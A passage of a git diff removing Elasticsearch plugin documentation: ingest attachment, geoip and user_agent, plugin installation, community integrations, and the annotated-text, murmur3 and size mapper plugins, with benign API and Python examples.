request headers use a -a `content-type` of `application/cbor`. - -NOTE: Not all {es} clients support custom HTTP request headers. - -[source,python] ----- -import cbor2 -import requests - -file = 'my-file' -headers = {'content-type': 'application/cbor'} - -with open(file, 'rb') as f: - doc = { - 'data': f.read() - } - requests.put( - 'http://localhost:9200/my-index-000001/_doc/my_id?pipeline=cbor-attachment', - data=cbor2.dumps(doc), - headers=headers - ) ----- - -[[ingest-attachment-extracted-chars]] -==== Limit the number of extracted chars - -To prevent extracting too many chars and overload the node memory, the number of chars being used for extraction -is limited by default to `100000`. You can change this value by setting `indexed_chars`. Use `-1` for no limit but -ensure when setting this that your node will have enough HEAP to extract the content of very big documents. - -You can also define this limit per document by extracting from a given field the limit to set. If the document -has that field, it will overwrite the `indexed_chars` setting. To set this field, define the `indexed_chars_field` -setting. 
- -For example: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data", - "indexed_chars" : 11, - "indexed_chars_field" : "max_size" - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=attachment -{ - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=" -} -GET my-index-000001/_doc/my_id --------------------------------------------------- - -Returns this: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 35, - "_primary_term": 1, - "_source": { - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "attachment": { - "content_type": "application/rtf", - "language": "sl", - "content": "Lorem ipsum", - "content_length": 11 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data", - "indexed_chars" : 11, - "indexed_chars_field" : "max_size" - } - } - ] -} -PUT my-index-000001/_doc/my_id_2?pipeline=attachment -{ - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "max_size": 5 -} -GET my-index-000001/_doc/my_id_2 --------------------------------------------------- - -Returns this: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id_2", - "_version": 1, - "_seq_no": 40, - "_primary_term": 1, - "_source": { - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "max_size": 5, - "attachment": { - "content_type": "application/rtf", - "language": "ro", - "content": "Lorem", - "content_length": 5 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -[[ingest-attachment-with-arrays]] -==== Using the Attachment Processor with arrays - -To use the attachment processor within an array of attachments the -{ref}/foreach-processor.html[foreach processor] is required. This -enables the attachment processor to be run on the individual elements -of the array. 
- -For example, given the following source: - -[source,js] --------------------------------------------------- -{ - "attachments" : [ - { - "filename" : "ipsum.txt", - "data" : "dGhpcyBpcwpqdXN0IHNvbWUgdGV4dAo=" - }, - { - "filename" : "test.txt", - "data" : "VGhpcyBpcyBhIHRlc3QK" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -In this case, we want to process the data field in each element -of the attachments field and insert -the properties into the document so the following `foreach` -processor is used: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information from arrays", - "processors" : [ - { - "foreach": { - "field": "attachments", - "processor": { - "attachment": { - "target_field": "_ingest._value.attachment", - "field": "_ingest._value.data" - } - } - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=attachment -{ - "attachments" : [ - { - "filename" : "ipsum.txt", - "data" : "dGhpcyBpcwpqdXN0IHNvbWUgdGV4dAo=" - }, - { - "filename" : "test.txt", - "data" : "VGhpcyBpcyBhIHRlc3QK" - } - ] -} -GET my-index-000001/_doc/my_id --------------------------------------------------- - -Returns this: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "my_id", - "_version" : 1, - "_seq_no" : 50, - "_primary_term" : 1, - "found" : true, - "_source" : { - "attachments" : [ - { - "filename" : "ipsum.txt", - "data" : "dGhpcyBpcwpqdXN0IHNvbWUgdGV4dAo=", - "attachment" : { - "content_type" : "text/plain; charset=ISO-8859-1", - "language" : "en", - "content" : "this is\njust some text", - "content_length" : 24 - } - }, - { - "filename" : "test.txt", - "data" : "VGhpcyBpcyBhIHRlc3QK", - "attachment" : { - "content_type" : "text/plain; charset=ISO-8859-1", - "language" : "en", - "content" : "This is a test", - "content_length" : 16 - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -Note that the `target_field` needs to be set, otherwise the -default value is used which is a top level field `attachment`. The -properties on this top level field will contain the value of the -first attachment only. However, by specifying the -`target_field` on to a value on `_ingest._value` it will correctly -associate the properties with the correct attachment. diff --git a/docs/plugins/ingest-geoip.asciidoc b/docs/plugins/ingest-geoip.asciidoc deleted file mode 100644 index 71be02c52dd..00000000000 --- a/docs/plugins/ingest-geoip.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[ingest-geoip]] -=== Ingest `geoip` Processor Plugin - -The `geoip` processor is no longer distributed as a plugin, but is now a module -distributed by default with Elasticsearch. See the -{ref}/geoip-processor.html[GeoIP processor] for more details. - -[[using-ingest-geoip]] -==== Using the `geoip` Processor in a Pipeline - -See {ref}/geoip-processor.html#using-ingest-geoip[using `ingest-geoip`]. 
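-
-Because the processor now ships with Elasticsearch itself, no plugin
-installation is required before referencing it in a pipeline. A minimal
-sketch, assuming an unsecured cluster on `localhost:9200`, a source field
-named `ip`, and a hypothetical pipeline name:
-
-[source,python]
---------------------------------------------------
-# Create a pipeline that enriches the `ip` field with geo information.
-import requests
-
-pipeline = {
-    "description": "Add geoip info",
-    "processors": [{"geoip": {"field": "ip"}}],
-}
-requests.put("http://localhost:9200/_ingest/pipeline/geoip-example",
-             json=pipeline).raise_for_status()
---------------------------------------------------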
diff --git a/docs/plugins/ingest-user-agent.asciidoc b/docs/plugins/ingest-user-agent.asciidoc deleted file mode 100644 index 51bfe7376c4..00000000000 --- a/docs/plugins/ingest-user-agent.asciidoc +++ /dev/null @@ -1,7 +0,0 @@ -[[ingest-user-agent]] -=== Ingest `user_agent` Processor Plugin - -The `user_agent` processor is no longer distributed as a plugin, but is now a module -distributed by default with Elasticsearch. See the -{ref}/user-agent-processor.html[User Agent processor] for more details. - diff --git a/docs/plugins/ingest.asciidoc b/docs/plugins/ingest.asciidoc deleted file mode 100644 index 257b74d9290..00000000000 --- a/docs/plugins/ingest.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[ingest]] -== Ingest Plugins - -The ingest plugins extend Elasticsearch by providing additional ingest node capabilities. - -[discrete] -=== Core Ingest Plugins - -The core ingest plugins are: - -<>:: - -The ingest attachment plugin lets Elasticsearch extract file attachments in common formats (such as PPT, XLS, and PDF) by -using the Apache text extraction library https://tika.apache.org/[Tika]. - -<>:: - -The `geoip` processor adds information about the geographical location of IP -addresses, based on data from the Maxmind databases. This processor adds this -information by default under the `geoip` field. The `geoip` processor is no -longer distributed as a plugin, but is now a module distributed by default with -Elasticsearch. See {ref}/geoip-processor.html[GeoIP processor] for more -details. - -<>:: - -A processor that extracts details from the User-Agent header value. The -`user_agent` processor is no longer distributed as a plugin, but is now a module -distributed by default with Elasticsearch. See -{ref}/user-agent-processor.html[User Agent processor] for more details. - -[discrete] -=== Community contributed ingest plugins - -The following plugin has been contributed by our community: - -* https://github.com/johtani/elasticsearch-ingest-csv[Ingest CSV Processor Plugin] (by Jun Ohtani) - -include::ingest-attachment.asciidoc[] - -include::ingest-geoip.asciidoc[] - -include::ingest-user-agent.asciidoc[] diff --git a/docs/plugins/install_remove.asciidoc b/docs/plugins/install_remove.asciidoc deleted file mode 100644 index 0bb9e680498..00000000000 --- a/docs/plugins/install_remove.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[discrete] -[id="{plugin_name}-install"] -==== Installation - -ifeval::["{release-state}"=="unreleased"] - -Version {version} of the Elastic Stack has not yet been released. - -endif::[] - -ifeval::["{release-state}"!="unreleased"] - -This plugin can be installed using the plugin manager: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------- -sudo bin/elasticsearch-plugin install {plugin_name} ----------------------------------------------------------------- - -The plugin must be installed on every node in the cluster, and each node must -be restarted after installation. - -You can download this plugin for <> from {plugin_url}/{plugin_name}/{plugin_name}-{version}.zip. To verify -the `.zip` file, use the -{plugin_url}/{plugin_name}/{plugin_name}-{version}.zip.sha512[SHA hash] or -{plugin_url}/{plugin_name}/{plugin_name}-{version}.zip.asc[ASC key]. 
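-
-If you want to check a downloaded `.zip` offline, you can compare its SHA-512
-digest against the published checksum file. A minimal sketch, assuming the
-archive and its `.sha512` file have already been downloaded side by side (the
-file names below are placeholders):
-
-[source,python]
---------------------------------------------------
-# Compare a local plugin archive against its published SHA-512 checksum.
-import hashlib
-from pathlib import Path
-
-zip_path = Path("plugin.zip")              # placeholder file names
-checksum_path = Path("plugin.zip.sha512")
-
-digest = hashlib.sha512(zip_path.read_bytes()).hexdigest()
-published = checksum_path.read_text().split()[0]  # first token is the hex digest
-
-print("checksum ok" if digest == published else "CHECKSUM MISMATCH")
---------------------------------------------------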
-endif::[] - -[discrete] -[id="{plugin_name}-remove"] -==== Removal - -The plugin can be removed with the following command: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------- -sudo bin/elasticsearch-plugin remove {plugin_name} ----------------------------------------------------------------- - -The node must be stopped before removing the plugin. - diff --git a/docs/plugins/integrations.asciidoc b/docs/plugins/integrations.asciidoc deleted file mode 100644 index d4417c4f6f5..00000000000 --- a/docs/plugins/integrations.asciidoc +++ /dev/null @@ -1,198 +0,0 @@ -[[integrations]] - -== Integrations - -Integrations are not plugins, but are external tools or modules that make it easier to work with Elasticsearch. - -[discrete] -[[cms-integrations]] -=== CMS integrations - -[discrete] -==== Supported by the community: - -* https://drupal.org/project/search_api_elasticsearch[Drupal]: - Drupal Elasticsearch integration via Search API. - -* https://drupal.org/project/elasticsearch_connector[Drupal]: - Drupal Elasticsearch integration. - -* https://wordpress.org/plugins/elasticpress/[ElasticPress]: - Elasticsearch WordPress Plugin - -* https://wordpress.org/plugins/wpsolr-search-engine/[WPSOLR]: - Elasticsearch (and Apache Solr) WordPress Plugin - -* https://doc.tiki.org/Elasticsearch[Tiki Wiki CMS Groupware]: - Tiki has native support for Elasticsearch. This provides faster & better - search (facets, etc), along with some Natural Language Processing features - (ex.: More like this) - -* https://extensions.xwiki.org/xwiki/bin/view/Extension/Elastic+Search+Macro/[XWiki Next Generation Wiki]: - XWiki has an Elasticsearch and Kibana macro allowing to run Elasticsearch queries and display the results in XWiki pages using XWiki's scripting language as well as include Kibana Widgets in XWiki pages - -[discrete] -[[data-integrations]] -=== Data import/export and validation - -NOTE: Rivers were used to import data from external systems into Elasticsearch prior to the 2.0 release. Elasticsearch -releases 2.0 and later do not support rivers. - -[discrete] -==== Supported by Elastic: - -* {logstash-ref}/plugins-outputs-elasticsearch.html[Logstash output to Elasticsearch]: - The Logstash `elasticsearch` output plugin. -* {logstash-ref}/plugins-inputs-elasticsearch.html[Elasticsearch input to Logstash] - The Logstash `elasticsearch` input plugin. -* {logstash-ref}/plugins-filters-elasticsearch.html[Elasticsearch event filtering in Logstash] - The Logstash `elasticsearch` filter plugin. -* {logstash-ref}/plugins-codecs-es_bulk.html[Elasticsearch bulk codec] - The Logstash `es_bulk` plugin decodes the Elasticsearch bulk format into individual events. - -[discrete] -==== Supported by the community: - -* https://github.com/jprante/elasticsearch-jdbc[JDBC importer]: - The Java Database Connection (JDBC) importer allows to fetch data from JDBC sources for indexing into Elasticsearch (by Jörg Prante) - -* https://github.com/BigDataDevs/kafka-elasticsearch-consumer[Kafka Standalone Consumer (Indexer)]: - Kafka Standalone Consumer [Indexer] will read messages from Kafka in batches, processes(as implemented) and bulk-indexes them into Elasticsearch. Flexible and scalable. More documentation in above GitHub repo's Wiki. 
- -* https://github.com/ozlerhakan/mongolastic[Mongolastic]: - A tool that clones data from Elasticsearch to MongoDB and vice versa - -* https://github.com/Aconex/scrutineer[Scrutineer]: - A high performance consistency checker to compare what you've indexed - with your source of truth content (e.g. DB) - -* https://github.com/salyh/elasticsearch-imap[IMAP/POP3/Mail importer]: - The Mail importer allows to fetch data from IMAP and POP3 servers for indexing into Elasticsearch (by Hendrik Saly) - -* https://github.com/dadoonet/fscrawler[FS Crawler]: - The File System (FS) crawler allows to index documents (PDF, Open Office...) from your local file system and over SSH. (by David Pilato) - -* https://github.com/senacor/elasticsearch-evolution[Elasticsearch Evolution]: - A library to migrate elasticsearch mappings. - -* https://pgsync.com[PGSync]: - A tool for syncing data from Postgres to Elasticsearch. - -[discrete] -[[deployment]] -=== Deployment - -[discrete] -==== Supported by the community: -* https://github.com/elastic/ansible-elasticsearch[Ansible]: - Ansible playbook for Elasticsearch. - -* https://github.com/elastic/puppet-elasticsearch[Puppet]: - Elasticsearch puppet module. - -* https://github.com/elastic/cookbook-elasticsearch[Chef]: - Chef cookbook for Elasticsearch - -[discrete] -[[framework-integrations]] -=== Framework integrations - -[discrete] -==== Supported by the community: - -* https://camel.apache.org/components/2.x/elasticsearch-component.html[Apache Camel Integration]: - An Apache camel component to integrate Elasticsearch - -* https://metacpan.org/pod/Catmandu::Store::ElasticSearch[Catmandu]: - An Elasticsearch backend for the Catmandu framework. - -* https://github.com/FriendsOfSymfony/FOSElasticaBundle[FOSElasticaBundle]: - Symfony2 Bundle wrapping Elastica. - -* https://plugins.grails.org/plugin/puneetbehl/elasticsearch[Grails]: - Elasticsearch Grails plugin. - -* https://haystacksearch.org/[Haystack]: - Modular search for Django - -* https://hibernate.org/search/[Hibernate Search] - Integration with Hibernate ORM, from the Hibernate team. Automatic synchronization of write operations, yet exposes full Elasticsearch capabilities for queries. Can return either Elasticsearch native or re-map queries back into managed entities loaded within transaction from the reference database. - -* https://github.com/spring-projects/spring-data-elasticsearch[Spring Data Elasticsearch]: - Spring Data implementation for Elasticsearch - -* https://github.com/dadoonet/spring-elasticsearch[Spring Elasticsearch]: - Spring Factory for Elasticsearch - -* https://github.com/twitter/storehaus[Twitter Storehaus]: - Thin asynchronous Scala client for Storehaus. - -* https://zeebe.io[Zeebe]: - An Elasticsearch exporter acts as a bridge between Zeebe and Elasticsearch - -* https://pulsar.apache.org/docs/en/io-elasticsearch[Apache Pulsar]: - The Elasticsearch Sink Connector is used to pull messages from Pulsar topics - and persist the messages to a index. - -* https://micronaut-projects.github.io/micronaut-elasticsearch/latest/guide/index.html[Micronaut Elasticsearch Integration]: - Integration of Micronaut with Elasticsearch - -* https://streampipes.apache.org[Apache StreamPipes]: - StreamPipes is a framework that enables users to work with IoT data sources. - -* https://metamodel.apache.org/[Apache MetaModel]: - Providing a common interface for discovery, exploration of metadata and querying of different types of data sources. 
- -* https://jooby.org/doc/elasticsearch/[Jooby Framework]: - Scalable, fast and modular micro web framework for Java. - -* https://micrometer.io[Micrometer]: - Vendor-neutral application metrics facade. Think SLF4j, but for metrics. - -[discrete] -[[hadoop-integrations]] -=== Hadoop integrations - -[discrete] -==== Supported by Elastic: - -* link:/guide/en/elasticsearch/hadoop/current/[es-hadoop]: Elasticsearch real-time - search and analytics natively integrated with Hadoop. Supports Map/Reduce, - Cascading, Apache Hive, Apache Pig, Apache Spark and Apache Storm. - -[discrete] -==== Supported by the community: - -* https://github.com/criteo/garmadon[Garmadon]: - Garmadon is a solution for Hadoop Cluster realtime introspection. - - -[discrete] -[[monitoring-integrations]] -=== Health and Performance Monitoring - -[discrete] -==== Supported by the community: - -* https://github.com/radu-gheorghe/check-es[check-es]: - Nagios/Shinken plugins for checking on Elasticsearch - -* https://sematext.com/spm/index.html[SPM for Elasticsearch]: - Performance monitoring with live charts showing cluster and node stats, integrated - alerts, email reports, etc. -* https://www.zabbix.com/integrations/elasticsearch[Zabbix monitoring template]: - Monitor the performance and status of your {es} nodes and cluster with Zabbix - and receive events information. - -[[other-integrations]] -[discrete] -=== Other integrations - -[discrete] -==== Supported by the community: - -* https://www.wireshark.org/[Wireshark]: - Protocol dissection for HTTP and the transport protocol - -* https://www.itemsapi.com/[ItemsAPI]: - Search backend for mobile and web diff --git a/docs/plugins/management.asciidoc b/docs/plugins/management.asciidoc deleted file mode 100644 index 0aa25e16011..00000000000 --- a/docs/plugins/management.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[management]] -== Management Plugins - -Management plugins offer UIs for managing and interacting with Elasticsearch. - -[discrete] -=== Core management plugins - -The core management plugins are: - -link:/products/x-pack/monitoring[X-Pack]:: - -X-Pack contains the management and monitoring features for Elasticsearch. It -aggregates cluster wide statistics and events and offers a single interface to -view and analyze them. You can get a link:/subscriptions[free license] for basic -monitoring or a higher level license for more advanced needs. diff --git a/docs/plugins/mapper-annotated-text.asciidoc b/docs/plugins/mapper-annotated-text.asciidoc deleted file mode 100644 index 9307b6aaefe..00000000000 --- a/docs/plugins/mapper-annotated-text.asciidoc +++ /dev/null @@ -1,320 +0,0 @@ -[[mapper-annotated-text]] -=== Mapper Annotated Text Plugin - -experimental[] - -The mapper-annotated-text plugin provides the ability to index text that is a -combination of free-text and special markup that is typically used to identify -items of interest such as people or organisations (see NER or Named Entity Recognition -tools). - - -The elasticsearch markup allows one or more additional tokens to be injected, unchanged, into the token -stream at the same position as the underlying text it annotates. 
- -:plugin_name: mapper-annotated-text -include::install_remove.asciidoc[] - -[[mapper-annotated-text-usage]] -==== Using the `annotated-text` field - -The `annotated-text` tokenizes text content as per the more common {ref}/text.html[`text`] field (see -"limitations" below) but also injects any marked-up annotation tokens directly into -the search index: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { - "type": "annotated_text" - } - } - } -} --------------------------- - -Such a mapping would allow marked-up text eg wikipedia articles to be indexed as both text -and structured tokens. The annotations use a markdown-like syntax using URL encoding of -one or more values separated by the `&` symbol. - - -We can use the "_analyze" api to test how an example annotation would be stored as tokens -in the search index: - - -[source,js] --------------------------- -GET my-index-000001/_analyze -{ - "field": "my_field", - "text":"Investors in [Apple](Apple+Inc.) rejoiced." -} --------------------------- -// NOTCONSOLE - -Response: - -[source,js] --------------------------------------------------- -{ - "tokens": [ - { - "token": "investors", - "start_offset": 0, - "end_offset": 9, - "type": "", - "position": 0 - }, - { - "token": "in", - "start_offset": 10, - "end_offset": 12, - "type": "", - "position": 1 - }, - { - "token": "Apple Inc.", <1> - "start_offset": 13, - "end_offset": 18, - "type": "annotation", - "position": 2 - }, - { - "token": "apple", - "start_offset": 13, - "end_offset": 18, - "type": "", - "position": 2 - }, - { - "token": "rejoiced", - "start_offset": 19, - "end_offset": 27, - "type": "", - "position": 3 - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -<1> Note the whole annotation token `Apple Inc.` is placed, unchanged as a single token in -the token stream and at the same position (position 2) as the text token (`apple`) it annotates. - - -We can now perform searches for annotations using regular `term` queries that don't tokenize -the provided search values. Annotations are a more precise way of matching as can be seen -in this example where a search for `Beck` will not match `Jeff Beck` : - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_field": "[Beck](Beck) announced a new tour"<1> -} - -PUT my-index-000001/_doc/2 -{ - "my_field": "[Jeff Beck](Jeff+Beck&Guitarist) plays a strat"<2> -} - -# Example search -GET my-index-000001/_search -{ - "query": { - "term": { - "my_field": "Beck" <3> - } - } -} --------------------------- - -<1> As well as tokenising the plain text into single words e.g. `beck`, here we -inject the single token value `Beck` at the same position as `beck` in the token stream. -<2> Note annotations can inject multiple tokens at the same position - here we inject both -the very specific value `Jeff Beck` and the broader term `Guitarist`. This enables -broader positional queries e.g. finding mentions of a `Guitarist` near to `start`. -<3> A benefit of searching with these carefully defined annotation tokens is that a query for -`Beck` will not match document 2 that contains the tokens `jeff`, `beck` and `Jeff Beck` - -WARNING: Any use of `=` signs in annotation values eg `[Prince](person=Prince)` will -cause the document to be rejected with a parse failure. In future we hope to have a use for -the equals signs so wil actively reject documents that contain this today. 
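-
-Because annotation values are URL encoded and must not contain `=`, it can be
-convenient to build the markup programmatically. A minimal sketch using only
-the Python standard library (the helper name and values are illustrative, not
-part of the plugin):
-
-[source,python]
---------------------------------------------------
-# Build annotated-text markup such as [Jeff Beck](Jeff+Beck&Guitarist).
-from urllib.parse import quote_plus
-
-def annotate(text, *values):
-    for value in values:
-        # Conservative guard: the plugin rejects documents whose annotation
-        # values contain an `=` sign.
-        if "=" in value:
-            raise ValueError(f"annotation value must not contain '=': {value}")
-    return f"[{text}]({'&'.join(quote_plus(v) for v in values)})"
-
-print(annotate("Jeff Beck", "Jeff Beck", "Guitarist"))
-# [Jeff Beck](Jeff+Beck&Guitarist)
---------------------------------------------------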
- - -[[mapper-annotated-text-tips]] -==== Data modelling tips -===== Use structured and unstructured fields - -Annotations are normally a way of weaving structured information into unstructured text for -higher-precision search. - -`Entity resolution` is a form of document enrichment undertaken by specialist software or people -where references to entities in a document are disambiguated by attaching a canonical ID. -The ID is used to resolve any number of aliases or distinguish between people with the -same name. The hyperlinks connecting Wikipedia's articles are a good example of resolved -entity IDs woven into text. - -These IDs can be embedded as annotations in an annotated_text field but it often makes -sense to include them in dedicated structured fields to support discovery via aggregations: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_unstructured_text_field": { - "type": "annotated_text" - }, - "my_structured_people_field": { - "type": "text", - "fields": { - "keyword" : { - "type": "keyword" - } - } - } - } - } -} --------------------------- - -Applications would then typically provide content and discover it as follows: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_unstructured_text_field": "[Shay](%40kimchy) created elasticsearch", - "my_twitter_handles": ["@kimchy"] <1> -} - -GET my-index-000001/_search -{ - "query": { - "query_string": { - "query": "elasticsearch OR logstash OR kibana",<2> - "default_field": "my_unstructured_text_field" - } - }, - "aggregations": { - "top_people" :{ - "significant_terms" : { <3> - "field" : "my_twitter_handles.keyword" - } - } - } -} --------------------------- - -<1> Note the `my_twitter_handles` contains a list of the annotation values -also used in the unstructured text. (Note the annotated_text syntax requires escaping). -By repeating the annotation values in a structured field this application has ensured that -the tokens discovered in the structured field can be used for search and highlighting -in the unstructured field. -<2> In this example we search for documents that talk about components of the elastic stack -<3> We use the `my_twitter_handles` field here to discover people who are significantly -associated with the elastic stack. - -===== Avoiding over-matching annotations -By design, the regular text tokens and the annotation tokens co-exist in the same indexed -field but in rare cases this can lead to some over-matching. - -The value of an annotation often denotes a _named entity_ (a person, place or company). -The tokens for these named entities are inserted untokenized, and differ from typical text -tokens because they are normally: - -* Mixed case e.g. `Madonna` -* Multiple words e.g. `Jeff Beck` -* Can have punctuation or numbers e.g. `Apple Inc.` or `@kimchy` - -This means, for the most part, a search for a named entity in the annotated text field will -not have any false positives e.g. when selecting `Apple Inc.` from an aggregation result -you can drill down to highlight uses in the text without "over matching" on any text tokens -like the word `apple` in this context: - - the apple was very juicy - -However, a problem arises if your named entity happens to be a single term and lower-case e.g. the -company `elastic`. 
In this case, a search on the annotated text field for the token `elastic` -may match a text document such as this: - - they fired an elastic band - -To avoid such false matches users should consider prefixing annotation values to ensure -they don't name clash with text tokens e.g. - - [elastic](Company_elastic) released version 7.0 of the elastic stack today - - - - -[[mapper-annotated-text-highlighter]] -==== Using the `annotated` highlighter - -The `annotated-text` plugin includes a custom highlighter designed to mark up search hits -in a way which is respectful of the original markup: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_field": "The cat sat on the [mat](sku3578)" -} - -GET my-index-000001/_search -{ - "query": { - "query_string": { - "query": "cats" - } - }, - "highlight": { - "fields": { - "my_field": { - "type": "annotated", <1> - "require_field_match": false - } - } - } -} --------------------------- - -<1> The `annotated` highlighter type is designed for use with annotated_text fields - -The annotated highlighter is based on the `unified` highlighter and supports the same -settings but does not use the `pre_tags` or `post_tags` parameters. Rather than using -html-like markup such as `cat` the annotated highlighter uses the same -markdown-like syntax used for annotations and injects a key=value annotation where `_hit_term` -is the key and the matched search term is the value e.g. - - The [cat](_hit_term=cat) sat on the [mat](sku3578) - -The annotated highlighter tries to be respectful of any existing markup in the original -text: - -* If the search term matches exactly the location of an existing annotation then the -`_hit_term` key is merged into the url-like syntax used in the `(...)` part of the -existing annotation. -* However, if the search term overlaps the span of an existing annotation it would break -the markup formatting so the original annotation is removed in favour of a new annotation -with just the search hit information in the results. -* Any non-overlapping annotations in the original text are preserved in highlighter -selections - - -[[mapper-annotated-text-limitations]] -==== Limitations - -The annotated_text field type supports the same mapping settings as the `text` field type -but with the following exceptions: - -* No support for `fielddata` or `fielddata_frequency_filter` -* No support for `index_prefixes` or `index_phrases` indexing diff --git a/docs/plugins/mapper-murmur3.asciidoc b/docs/plugins/mapper-murmur3.asciidoc deleted file mode 100644 index 14f93186805..00000000000 --- a/docs/plugins/mapper-murmur3.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[mapper-murmur3]] -=== Mapper Murmur3 Plugin - -The mapper-murmur3 plugin provides the ability to compute hash of field values -at index-time and store them in the index. This can sometimes be helpful when -running cardinality aggregations on high-cardinality and large string fields. 
- -:plugin_name: mapper-murmur3 -include::install_remove.asciidoc[] - -[[mapper-murmur3-usage]] -==== Using the `murmur3` field - -The `murmur3` is typically used within a multi-field, so that both the original -value and its hash are stored in the index: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { - "type": "keyword", - "fields": { - "hash": { - "type": "murmur3" - } - } - } - } - } -} --------------------------- - -Such a mapping would allow to refer to `my_field.hash` in order to get hashes -of the values of the `my_field` field. This is only useful in order to run -`cardinality` aggregations: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_field": "This is a document" -} - -PUT my-index-000001/_doc/2 -{ - "my_field": "This is another document" -} - -GET my-index-000001/_search -{ - "aggs": { - "my_field_cardinality": { - "cardinality": { - "field": "my_field.hash" <1> - } - } - } -} --------------------------- - -<1> Counting unique values on the `my_field.hash` field - -Running a `cardinality` aggregation on the `my_field` field directly would -yield the same result, however using `my_field.hash` instead might result in -a speed-up if the field has a high-cardinality. On the other hand, it is -discouraged to use the `murmur3` field on numeric fields and string fields -that are not almost unique as the use of a `murmur3` field is unlikely to -bring significant speed-ups, while increasing the amount of disk space required -to store the index. diff --git a/docs/plugins/mapper-size.asciidoc b/docs/plugins/mapper-size.asciidoc deleted file mode 100644 index c7140d865b8..00000000000 --- a/docs/plugins/mapper-size.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ -[[mapper-size]] -=== Mapper Size Plugin - -The mapper-size plugin provides the `_size` metadata field which, when enabled, -indexes the size in bytes of the original -{ref}/mapping-source-field.html[`_source`] field. - -:plugin_name: mapper-size -include::install_remove.asciidoc[] - -[[mapper-size-usage]] -==== Using the `_size` field - -In order to enable the `_size` field, set the mapping as follows: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "_size": { - "enabled": true - } - } -} --------------------------- - -The value of the `_size` field is accessible in queries, aggregations, scripts, -and when sorting: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "text": "This is a document" -} - -PUT my-index-000001/_doc/2 -{ - "text": "This is another document" -} - -GET my-index-000001/_search -{ - "query": { - "range": { - "_size": { <1> - "gt": 10 - } - } - }, - "aggs": { - "sizes": { - "terms": { - "field": "_size", <2> - "size": 10 - } - } - }, - "sort": [ - { - "_size": { <3> - "order": "desc" - } - } - ], - "script_fields": { - "size": { - "script": "doc['_size']" <4> - } - }, - "docvalue_fields": [ - { - "field": "_size" <5> - } - ] -} --------------------------- -// TEST[continued] - -<1> Querying on the `_size` field -<2> Aggregating on the `_size` field -<3> Sorting on the `_size` field -<4> Uses a -{ref}/search-fields.html#script-fields[script field] -to return the `_size` field in the search response. -<5> Uses a -{ref}/search-fields.html#docvalue-fields[doc value -field] to return the `_size` field in the search response. 
Doc value fields are -useful if -{ref}/modules-scripting-security.html#allowed-script-types-setting[inline -scripts are disabled]. diff --git a/docs/plugins/mapper.asciidoc b/docs/plugins/mapper.asciidoc deleted file mode 100644 index 01046d270e7..00000000000 --- a/docs/plugins/mapper.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[mapper]] -== Mapper Plugins - -Mapper plugins allow new field data types to be added to Elasticsearch. - -[discrete] -=== Core mapper plugins - -The core mapper plugins are: - -<>:: - -The mapper-size plugin provides the `_size` metadata field which, when enabled, -indexes the size in bytes of the original -{ref}/mapping-source-field.html[`_source`] field. - -<>:: - -The mapper-murmur3 plugin allows hashes to be computed at index-time and stored -in the index for later use with the `cardinality` aggregation. - -<>:: - -The annotated text plugin provides the ability to index text that is a -combination of free-text and special markup that is typically used to identify -items of interest such as people or organisations (see NER or Named Entity Recognition -tools). - -include::mapper-size.asciidoc[] -include::mapper-murmur3.asciidoc[] -include::mapper-annotated-text.asciidoc[] diff --git a/docs/plugins/plugin-script.asciidoc b/docs/plugins/plugin-script.asciidoc deleted file mode 100644 index 775dd28e0ff..00000000000 --- a/docs/plugins/plugin-script.asciidoc +++ 